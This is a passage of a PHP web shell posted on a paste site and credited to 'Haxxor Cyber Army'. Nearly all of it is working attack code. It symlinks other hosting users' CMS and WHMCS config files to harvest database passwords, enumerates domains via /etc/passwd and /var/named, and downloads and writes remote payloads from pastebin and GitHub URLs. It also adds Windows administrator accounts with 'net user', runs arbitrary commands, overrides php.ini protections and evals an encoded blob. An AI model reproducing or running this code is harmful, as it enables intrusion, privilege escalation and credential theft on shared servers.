- if (is_readable($dirz)) { copy($dirz, ''.$path.'/'.$r.'.txt');
- $p=file_get_contents(''.$path.'/'.$r.'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
- $dc++;
- flush();
- $l=$l?0:1;
- $j++;
- } } } echo '</table>';
- $total = $dc;
- echo '<br><h3>Total cPanel Found = '.$total.'</h3><br />';
- echo '</center>';
- } }else{ echo "<h3><i><font color='red'>ERROR</font><br><font color='red'>/var/named</font> or <font color='red'>etc/named.conf</font> Not Accessible!</i></h3>";
- } echo "</body></html>";
- die();
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'vn')) {
- ?>
- <form action="?path=
- <?php echo $path;
- ?>&
- x=vn" method="post">
- <center><h2>Domain Viewer</h2></center><br><br>
- <?php function openBaseDir() { $openBaseDir = ini_get("open_basedir");
- if (!$openBaseDir) { $openBaseDir = '<font color="green">OFF</font>';
- } else { $openBaseDir = '<font color="red">ON</font>';
- } return $openBaseDir;
- } echo '
- <table width="95%" cellspacing="0" cellpadding="0" >
- <td height="100" align="left" >';
- $pg = basename(__FILE__);
- $safe_mode = @ini_get('safe_mode');
- $dir = @getcwd();
- @mkdir('pee',0777);
- @symlink("/","pee/root");
- $htaccss = "Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any";
- file_put_contents("pee/.htaccess",$htaccss);
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("\n",$etc);
- foreach($etcz as $etz){ $etcc = explode(":",$etz);
- error_reporting(0);
- $current_dir = posix_getcwd();
- $dir = explode("/",$current_dir);
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- } if(is_readable("/var/named")){ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
- echo'<tr><td><center><b>SITE</b></center></td><td>
- <center><b>USER</b></center></td>
- <td></center><b>SYMLINK</b></center></td>';
- $list = scandir("/var/named");
- foreach($list as $domain){ if(strpos($domain,".db")){ $i += 1;
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
- <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
- <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
- } } echo "<center>Total Domains Found: ".$i."</center><br />";
- }else{ echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>";
- } die();
- error_reporting(0);
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("\n",$etc);
- if(is_readable("/etc/passwd")){ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
- echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
- $list = scandir("/var/named");
- foreach($etcz as $etz){ $etcc = explode(":",$etz);
- foreach($list as $domain){ if(strpos($domain,".db")){ $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- if($owner['name'] == $etcc[0]) { $i += 1;
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
- <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
- <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
- }}}} echo "<center>Total Domains Found: ".$i."</center><br />";
- } die();
- if(is_readable("/etc/named.conf")){ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
- echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
- $named = file_get_contents("/etc/named.conf");
- preg_match_all('%zone \"(.*)\" {%',$named,$domains);
- foreach($domains[1] as $domain){ $domain = trim($domain);
- $i += 1;
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
- } echo "<center>Total Domains Found: ".$i."</center><br />";
- } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>";
- } die();
- if(is_readable("/etc/valiases")){ echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
- echo'<tr><td><center><b>SITE</b></center></td><td>
- <center><b>USER</b></center></td><td></center>
- <b>SYMLINK</b></center></td>';
- $list = scandir("/etc/valiases");
- foreach($list as $domain){ $i += 1;
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
- <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
- <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
- } echo "<center>Total Domains Found: ".$i."</center><br />";
- } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>";
- } die();
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'dump')) {
- ?>
- <br/><br/>
- <form action="?path=
- <?php echo $path;
- ?>&
- x=dump" method="post">
- <?php $select = $_POST['options'];
- echo'<center>
- <table border=1>
- <select class="bordergaya" align="left" name="options" id="select">
- <option value="dumper">Gate 1</option>
- </select>
- <input type="submit" name="submites" class="bordergaya" value="Click here for Dump Email">';
- ?>
- <?php if ( $select == "dumper") { $files = file_get_contents("http://pastebin.com/raw/HhiURUER");
- file_put_contents("dumper.php",$files);
- echo "<script>alert('Done! Access dumper.php for processing');
- hideAll();
- </script>";
- echo "<a href=".'dumper.php'." target=_blank><br/><br/><b>dumper.php [Click here]</b></a></center>";
- die();
- } echo'</td></form></tr></table>';
- die();
- } if(isset($_GET['x']) && ($_GET['x'] == 'krdp')) { if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
- ?><br/><br/>
- <div id="content-left">
- <form action="" method="post">
- <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
- <tr>
- <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
- </tr>
- <tr>
- <td><font class='kecew'>Username</font></td>
- <td><font class='kecew'> : </font></td>
- <td><input type="text" class="bordergaya" name="username" required></td>
- </tr>
- <tr>
- <td><font class='kecew'>Password</font></td>
- <td><font class='kecew'> : </font></td>
- <td><input type="text" class="bordergaya" name="password" required></td>
- </tr>
- <tr>
- <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
- </tr>
- </table>
- </form>
- </div>
- <br/>
- <div id="content-left">
- <form action="" method="post">
- <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
- <tr>
- <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
- </tr>
- <tr>
- <td><font class='kecew'>Username</font></td>
- <td><font class='kecew'> : </font></td>
- <td><input type="text" name="rusername" placeholder="Masukan Username" class="bordergaya"></td>
- </tr>
- <tr>
- <td><font class='kecew'>Password</font></td>
- <td><font class='kecew'> : </font></td>
- <td><input type="text" name="gantipw" placeholder="Password Baru" class="bordergaya"></td>
- </tr>
- <tr>
- <td><font class='kecew'>Action</font></td>
- <td><font class='kecew'> : </font></td>
- <td>
- <select name="aksi" class="bordergaya">
- <option value="1">Show Username</option>
- <option value="2">Happy Username</option>
- <option value="3">Change Password</option>
- </select>
- </td>
- </tr>
- <tr>
- <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
- </tr>
- </table>
- </form>
- <br/>
- </div>
- </center></center>
- <?php if($_POST['submit']) { if($_POST['kshell']=="1") { $r_user = $_POST['username'];
- $r_pass = $_POST['password'];
- $cmd_cek_user = shell_exec("net user");
- if(preg_match("/$r_user/", $cmd_cek_user)){ echo $gaya_root.$r_user." sudah ada".$o;
- }else { $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
- $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
- $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
- $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
- if($cmd_add_user){ echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Succeed!</font></font><br/><br/>".$o;
- }else { echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>Failed!</font><br/><br/>".$o;
- } echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar.. <br/>";
- if($cmd_add_groups1){ echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Successful in Process!</font><br/><br/>".$o;
- }else if($cmd_add_groups2){ echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Successful in Process!</font><br/><br/>".$o;
- }else if($cmd_add_groups3){ echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Successful in Process!</font><br/><br/>".$o;
- }else { echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>Failed Di Proses!</font><br/><br/>".$o;
- } echo "<font class='rapihbanget'>[+] Server Info : </font><br/>";
- echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username : ".$r_user."</font><br/><font class='rapihbanget'>--- Password : </font>".$r_pass.$o."</font><br/><br/>";
- echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>";
- } } else if($_POST['kshell']=="2") { echo "<style>
- .coeg{margin-left:30%;
- }
- </style>";
- if($_POST['aksi']=="1"){ echo "<pre class='coeg'>".shell_exec("net user");
- } else if($_POST['aksi']=="2") { $username = $_POST['rusername'];
- $cmd_cek_user = shell_exec("net user");
- if (!empty($username)){ if(preg_match("/$username/", $cmd_cek_user)){ $cmd_add_user = shell_exec("net user ".$username." /DELETE");
- if($cmd_add_user){ echo "<font class='rapihbanget'>[+] Processing.. Please Wait.. </font><br /><br />";
- echo $gaya_root."<font class='rapihbanget'>[+] Happy! Remove User </font><font color='orange'>".$username." </font><font color='greenyellow'>Succeed!!</font><br /><br />".$o;
- }else { echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User </font><font color='orange'>".$username." </font><font color='red'>Failed!!</font><br /><br />".$o;
- } }else { echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> It's Not There!!</font><br /><br />".$o;
- } }else { echo $gaya_root."<font class='rapihbanget'> Please Enter The Username You Want To Be Happy!! </font><br /><br />".$o;
- } } else if($_POST['aksi']=="3") { echo "<style>
- .tengahaja{margin-left:35%}
- </style>";
- $username = $_POST['rusername'];
- $password = $_POST['gantipw'];
- $cmd_cek_user = shell_exec("net user");
- if (!empty($username)){ if(preg_match("/$username/", $cmd_cek_user)){ $cmd_add_user = shell_exec("net user ".$username."");
- if($cmd_add_user){ echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Succeed!!</font><br /><br />".$o;
- }else { echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>Failed!!</font><br /><br />".$o;
- } }else { echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> It's Not There!!</font><br /><br />".$o;
- } }else { echo $gaya_root."<font class='rapihbanget'> Please Enter The Username You Want To Be Happy!! </font><br /><br />".$o;
- } } } } } else{ echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS CANNOT BE USED AND -_- THE SERVER IS NOT WINDOWS</font>";
- }die();
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'fcrot')) { echo'<center><br><br><h3>File Creator [Auto upload]</h3>
- <table>
- <tr><form method="post" action="">
- <td>
- <select class="bordergaya" align="left" name="options" id="select">
- <option value="hsphere">Bypass hSphere Shell</option>
- <option value="adminer">Adminer</option>
- </select>
- <input type="submit" name="submites" class="bordergaya" value="create">
- </td></form></tr></table><br/><br/><br/>';
- error_reporting(0);
- set_time_limit(0);
- $submit = $_POST ['submites'];
- if(isset($submit)) { $select = $_POST['options'];
- if ( $select == 'hsphere') { $files = file_get_contents("https://raw.githubusercontent.com/famous0123/Parallels-H-Sphere-Exploiter/master/HSphere.php");
- file_put_contents("hsphere.php",$files);
- echo "<script>alert('Bypass hsphere shell created!');
- hideAll();
- </script>";
- echo "<a href="."hsphere.php"." target=_blank><b>hsphere.php [Click here]</b></a></center>";
- die();
- } elseif ( $select == 'adminer') { getfile("https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php","adminer.php");
- echo "<script>alert('adminer created!');
- hideAll();
- </script>";
- echo "<a href="."adminer.php"." target=_blank><b>adminer.php [Click here]</b></a></center>";
- die();
- } }die();
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'korong')) { echo '<center><br /><br />
- <form enctype="multipart/form-data" method="POST">
- <input type="file" name="file" id="file" class="inputfile inputfile-4" />
- <label for="file">
- <figure>
- <svg xmlns="http://www.w3.org/2000/svg" width="20" height="17" viewBox="0 0 20 17"><path d="M10 0l-5.2 4.9h3.3v5.1h3.8v-5.1h3.3l-5.2-4.9zm9.3 11.5l-3.2-2.1h-2l3.4 2.6h-3.5c-.1 0-.2.1-.2.1l-.8 2.3h-6l-.8-2.2c-.1-.1-.1-.2-.2-.2h-3.6l3.4-2.6h-2l-3.2 2.1c-.4.3-.7 1-.6 1.5l.6 3.1c.1.5.7.9 1.2.9h16.3c.6 0 1.1-.4 1.3-.9l.6-3.1c.1-.5-.2-1.2-.7-1.5z"/></svg>
- </figure>
- <span>Please Select File</span>
- </label>';
- ?>
- <script type="text/javascript">
- /*
- By Osvaldas Valutis, www.osvaldas.info
- Available for use under the MIT License
- */
- 'use strict';
- ;
- ( function ( document, window, index )
- {
- var inputs = document.querySelectorAll( '.inputfile' );
- Array.prototype.forEach.call( inputs, function( input )
- {
- var label = input.nextElementSibling,
- labelVal = label.innerHTML;
- input.addEventListener( 'change', function( e )
- {
- var fileName = '';
- if( this.files && this.files.length > 1 )
- fileName = ( this.getAttribute( 'data-multiple-caption' ) || '' ).replace( '{count}', this.files.length );
- else
- fileName = e.target.value.split( '\\' ).pop();
- if( fileName )
- label.querySelector( 'span' ).innerHTML = fileName;
- else
- label.innerHTML = labelVal;
- });
- // Firefox bug fix
- input.addEventListener( 'focus', function(){ input.classList.add( 'has-focus' );
- });
- input.addEventListener( 'blur', function(){ input.classList.remove( 'has-focus' );
- });
- });
- }( document, window, 0 ));
- </script>
- <?php echo'<br/>
- <input type="submit" class="tombolupil" value="Upload File!" />
- </form>';
- if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<script>alert("File Successful!");
- </script>';
- }else{ echo '<script>alert("File Failed to Upload!");
- </script>';
- } } echo "</center><br /><br />";
- die();
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'cmd')) { echo "<br/><br/><form method='post'>
- <font clss='rapihbanget'>Command :</font>
- <input class='bordergaya' type='text' size='30' height='10' name='cmd'><input type='submit' class='bordergaya' name='execmd' value=' Execute '>
- </form>";
- if($_POST['execmd']) { echo "<pre>".exe($_POST['cmd'])."</pre>";
- } } elseif(isset($_GET['x']) && ($_GET['x'] == 'bypstuls')) { echo "<br/><br/>Please Choose the Key<br/><br/>";
- ?>
- <a href="?
- <?php echo "path=".$path;
- ?>&
- x=bysysfuncwsf"><input class=bordergaya type=submit value="Bypass Root Path With System Function" /></a>
- Or <a href="?
- <?php echo "path=".$path;
- ?>&
- x=bypsini"><input class=bordergaya type=submit value="Bypass Disable Functions" /></a>
- Or <a href="?
- <?php echo "path=".$path;
- ?>&
- x=bysysfuncwexec"><input class=bordergaya type=submit value="Bypass Root Path With Exec Function" /></a>
- <br/><br/><br/><br/>
- <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwsf')) { echo '<br><center><span style="font-size:20px;
- font-family:Fredericka the Great;
- color:orange">Bypass Root Path With System Function</span><center>';
- mkdir('bysyswsf', 0755);
- chdir('bysyswsf');
- $bysyswsf = file_get_contents("http://pastebin.com/raw/nUTTPQnm");
- $file = fopen("bysyswsf.php" ,"w+");
- $write = fwrite ($file ,$bysyswsf);
- fclose($file);
- chmod("bysyswsf.php",0755);
- echo "<iframe src=bysyswsf/bysyswsf.php width=70% height=70% frameborder=0></iframe>";
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'bypsini')) { $byht = "safe_mode = Off
- disable_functions = None
- safe_mode_gid = OFF
- open_basedir = OFF
- allow_url_fopen = On";
- file_put_contents("php.ini",$byht);
- echo "<script>alert('Congrats ^_^');
- hideAll();
- </script>";
- die('<meta http-equiv="refresh" content="0;
- url=?" />');
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwexec')) { echo '<br><center><span style="font-size:20px;
- font-family:Fredericka the Great;
- color:orange">Bypass Root Path With Exec Function</span><center>';
- mkdir('bysyswexecf', 0755);
- chdir('bysyswexecf');
- $bysyswsf = file_get_contents("http://pastebin.com/raw/KJiLdADd");
- $file = fopen("bysyswexecf.php" ,"w+");
- $write = fwrite ($file ,$bysyswsf);
- fclose($file);
- chmod("bysyswexecf.php",0755);
- echo "<iframe src=bysyswexecf/bysyswexecf.php width=70% height=70% frameborder=0></iframe>";
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){
- ?>
- <form action="?path=
- <?php echo $pwd;
- ?>&
- x=jumping" method="post">
- <?php ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
- set_time_limit(0);
- @$passwd = fopen('/etc/passwd','r');
- if (!$passwd) { die('<br>[-] Error : coudn`t read /etc/passwd');
- } $pub = array();
- $users = array();
- $conf = array();
- $i = 0;
- while(!feof($passwd)) { $str = fgets($passwd);
- if ($i > 35) { $pos = strpos($str,':');
- $username = substr($str,0,$pos);
- $dirz = '/home/'.$username.'/public_html/';
- if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username);
- array_push($pub,$dirz);
- } } } $i++;
- } echo '<br><br></center></center>';
- echo "<font class='rapihbanget'>[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br /></font>";
- echo "<font class='rapihbanget'>[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /></font>";
- echo "<font class='rapihbanget'>[~] Searching for passwords in config files...<br /><br /></font>";
- foreach ($users as $user) { $path = "/home/$user/public_html/";
- echo "<font class='rapihbanget'><a href='?path=
- $path' target='_blank' font-weight:bold;
- color:#F80;
- '>$path</a><br></font>";
- } echo "<br /><font class='rapihbanget'>[+] Complete...\n"."<br /></font>";
- echo "<font class='rapihbanget'>[+] Power By HCA-TEAM\n"."<br /></font>";
- echo '<br><br></b></body><center>';
- } elseif(isset($_GET['x']) && ($_GET['x'] == 'zonesH')){ echo "<br/><br/>";
- @eval(gzinflate(base64_decode($zoneH)));
- "</div>";
- } else{ echo '<table><br />';
- echo "<center>";
- if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<script>alert("Delete Dir Success!");
- </script>';
- }else{ echo '<script>alert("Delete Dir Failed!");
- </script>';
- } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<script>alert("Delete File Success!");
- </script>';
- }else{ echo '<script>alert("Delete File Failed!");
- </script>';
- } } } echo '</center>';
- $scandir = scandir($path);
- echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
- ';
- foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
- echo "<tr>
- <td><a style='color:white;
- font-family:Homenaje;
- ' href=\"?path=$path/$dir\">$dir</a></td>
- <td><center style='color:orange;
- font-family:Homenaje;
- '>--</center></td>
- <td><center>";
- if(is_writable("$path/$dir")) echo "<font style='color:springgreen;
- font-family:Homenaje;
- '>";
- elseif(!is_readable("$path/$dir")) echo "<font style='color:red;
- font-family:Homenaje;
- '>";
- echo perms("$path/$dir");
- if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
- echo "</center></td>
- <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
- <select class='bordergaya' name=\"opt\">
- <option value=\"\"></option>
- <option value=\"delete\">Delete</option>
- <option value=\"chmod\">Chmod</option>
- <option value=\"rename\">Rename</option>
- </select>
- <input type=\"hidden\" name=\"type\" value=\"dir\">
- <input type=\"hidden\" name=\"name\" value=\"$dir\">
- <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
- <input class='bordergaya' type=\"submit\" value=\"Execute\" />
- </form></center></td>
- </tr>";
- } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
- foreach($scandir as $file){ if(!is_file("$path/$file")) continue;
- $size = filesize("$path/$file")/1024;
- $size = round($size,3);
- if($size >= 1024){ $size = round($size/1024,2).' MB';
- }else{ $size = $size.' KB';
- } echo "<tr>
- <td><a style='color:white;
- font-family:Homenaje;
- ' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
- <td><center style='color:orange;
- font-family:Homenaje;
- '>".$size."</center></td>
- <td><center>";
- if(is_writable("$path/$file")) echo "<font style='color:springgreen;
- font-family:Homenaje;
- '>";
- elseif(!is_readable("$path/$file")) echo "<font style='color:red;
- font-family:Homenaje;
- '>";
- echo perms("$path/$file");
- if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
- echo "</center></td>
- <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
- <select class='bordergaya' name=\"opt\">
- <option value=\"\"></option>
- <option value=\"delete\">Delete</option>
- <option value=\"chmod\">Chmod</option>
- <option value=\"rename\">Rename</option>
- <option value=\"edit\">Edit</option>
- </select>
- <input type=\"hidden\" name=\"type\" value=\"file\">
- <input type=\"hidden\" name=\"name\" value=\"$file\">
- <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
- <input class='bordergaya' type=\"submit\" value=\"Execute\" />
- </form></center></td>
- </tr>";
- } echo '</table>
- </div>';
- }
- ?>
- <br/><br/>
- <div id="bawah">
- <script language="JavaScript">
- Year=new Date();
- var copyright=Year.getUTCFullYear();
- document.write("<tabel style='padding:3px 6px;
- border:2px solid #2d2b2b;
- border-radius:5px;
- '><tr><td><font face='Fredericka the Great' size='3px' color='gray'> ♥
- Haxxor Cyber Army" + copyright +" ♥
- </font></td></tr></table>");
- </script>
- </div>
- </BODY></html>
File Description
- haxxor
- PHP Code
- 16 May-2022
- 81.67 Kb
You can Share it:
Latest PHP Pastes